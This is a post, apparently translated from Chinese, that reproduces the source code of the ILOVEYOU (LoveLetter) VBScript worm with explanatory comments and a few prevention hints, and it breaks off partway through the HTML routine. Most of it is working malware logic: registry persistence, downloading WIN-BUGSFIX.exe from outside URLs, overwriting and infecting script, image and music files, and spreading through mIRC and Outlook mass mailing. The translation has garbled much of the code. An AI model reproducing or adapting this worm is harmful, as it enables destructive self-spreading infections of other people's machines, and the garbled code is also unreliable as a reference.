'Description. Publish this article is to let you know the love letter and effectively prevented. 'If the moderator believes this article may be used by bad people, please delete. 'The Chinese comment in the program is the addition of it, and is explained for the virus characteristics, and a method of preventing a virus is given. 'I personally think that LOVE Letter is not very good, but the many technologies it use is indeed an admiring' virus authors may have not received professional programming, but from the selection program resources, it is indeed some effort. 'This virus source code can also be used to answer a lot of questions from VB enthusiasts. REM BAROK -LOVELETTER (VBE) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines' Note: Program author's signature (possib) on Error ResMe Next Dim Fso, Dirsystem, Dirwin, Dirtemp, EQ, CTR, File, VBScopy, Dow EQ = "" CTR = 0 set fso = createObject ("scripting.filesystemObject") 'Note: FileSystemObject is the most dangerous part of the M $ VBVM system, its The function is very powerful 'Use FSO from the virus to know that by modifying the registry, it can easily prevent the LETTER episode. Set file = fso.opentextFile (wscript.scriptfullname, 1) vbscopy = file.readall main () 'Note - The initialization of the program is completed. sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD" 'Note - Prevents the termination caused by the operation timeout. 'It should be said that programmers who write viruses take into account the possible problems, this is worth all of the programming. Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2) 'Get the name of the system key folder "VB can be used when programming. Set c = fso.getfile (wscript.scriptfullname) C.copy (Dirsystem & "/ mskernel32.vbs") c.copy (Dirwin & "/ Win32dll.vbs") C. Copy (Dirsystem & "/ Love-letter-for-you. TXT.VBS ") 'Copy itself to the key directory. 'The file name is not very good. It's easy to find it.
REGRUNS () HTML () spreadtoemail () ListAdriv () End sub subs regruns () modifies the registry to automatically load the virus program 'prevention: often check this branch in the registry. 'Known methods also put HTA in a Startup folder. The method used by the virus program is more advanced, 'Because it does not fail because of language problems.
On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"
/WIN-BUGSFIX.exe "regcreate" HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Main / Start Page "," about: blank "end if end sub sub listadriv 'through all the drives On Error Resume Next Dim d, dc, s. SET DC = FSO.DRIVES for Each D in DC if D.DriveType = 2 or D.DriveType = 3 THEN FOLDERLIST (D.Path & "/") End If Next ListAdriv = S End Sub InfectFiles (Folderspec) 'Performing infection files Operation.
On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files for Each F1 in fc ext = fso.getextensionName (F1. PATH) EXT = LCASE (EXT) S = LCase (f1.name) IF (ext = "VBS") or (ext = "vbe") THEN SET AP = FSO.OpenTextFile (f1.path, 2, true) AP. Write vbscopy ap.close elseif (ext = "js") or (ext = "css") or (ext = "wsh") or (ext = "sct") or (ext = " HTA ") THENTETFILE (f1.path, 2, true) ap.write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (Folderspec & "/" & BNAME & ". VBS") fso.deletefile (f1.path) elseif (ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextfile (f1.path, 2, true ) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) Cop.copy (f1.path & ". vbs") fso.deletefile (f1.path) elseif (ext = "mp3") or (ext) OR (EXT = "MP2") THEN SET MP3 = fso.createteTextFile (f1.path & ". vbs") mp3.write vbscopy mp3.close set att = fso.getfile (f1.path) att.attributes = att.attributes 2 end if IF (EQ <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlin K32.exe ") or (s =" mirc.ini ") or (s =" scri pt.ini ") or (s =" mirc.hlp ") THEN SET Scriptini = fso.createteTextFile (Folderspec &" / Script.ini ") scriptini.WriteLine" [script] "scriptini.WriteLine"; mIRC Script "scriptini.WriteLine"; Please dont edit this script ... mIRC will corru pt, if mIRC will "scriptini.WriteLine" corrupt ... WINDOWS will Affect And Will NOT Run Correctly. Thanks
'The English language of the viral authors is afraid that you have not learned it ... but so that you are scarring people. 'Here you remind you to pay attention, don't care about those scary texts, you will find that the vulnerability is not very small. Scriptini.writeline ";" scriptini.writeline "; khaled mardam-bey" scriptini.writeline "; http://www.mirc.com" scriptini.writeline ";" scriptini.writeline "N0 = On 1: Join: #: {"scriptini.writeline" n1 = / if ($ nick == $ me) {halt} "scriptini.writeline" N2 = /.dcc send $ Nick "& Dirsystem &" / Love-letter-fo r-you.htm "scriptini .Writeline "N3 =}" 'Note that the result of this is that MIRC can also communicate viruses. scriptini.close eq = folderspec end if end if next end sub sub folderlist (folderspec) 'traverse folder On Error Resume Next dim f, f1, sf set f = fso.GetFolder (folderspec) set sf = f.SubFolders for each f1 In sf infectfiles (f1.path) folderlist (f1.path) Next End sub subs regreate (regKey, regvalue) 'Modify the registry (creating key)' This program seems to be Microsoft's demonstration program. Set regedit = createObject ("wscript.shell") regedit.regWrite Regkey, RegValue End Sub Function Regget (Value) 'This program seems to be Microsoft's demonstration program. (WSH Demonstration, in Windows Folder) Set regedit = createObject ("wscript.shell") Regget = regedit.regread (value) End function function fileexist (filespec) 'Decision file exists' purely from technical perspective, this program Write not good. 'Don't write so long, you can implement the same function on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function function folderexist (folderspec)' Judgment folder Whether the existence 'is as stinking in the previous program.
On Error Resume Next dim msg if (fso.GetFolderExists (folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail () 'diffusion Email On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( "Outlook.Application") 'limitations virus: only supports Outlook, and Outlook Express is not supported . set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "IloveYou" The reason for the name of the virus' "see such a message is definitely a virus. The normal person of the mind is probably not straightforward.
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from m e." male.Attachments.Add (dirsystem & "/ LOVELETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / WAB / "& malead, 1," REG_DWORD "end if x = x 1 next regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& a, a.Addre ssEntries.Count else regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& A, A.Addre Ssentries.count End End Set Out = Nothing SET MAPI = Nothing End Sub Sub HTML 'From the technical point of view, this program is very beautiful, the reason is to fully utilize Outlook Resource. 'It is worth writing a program. 'The _ symbol in the middle of the program is the cable, so the comment is written here. 'There are many invalid statements in the program, and there are a lot of space.
On Error ResMe next Dim line, N, DTA1, DTA2, DT1, DT2, DT3, DT4, L1, DT5, DT6 DTA1 = "
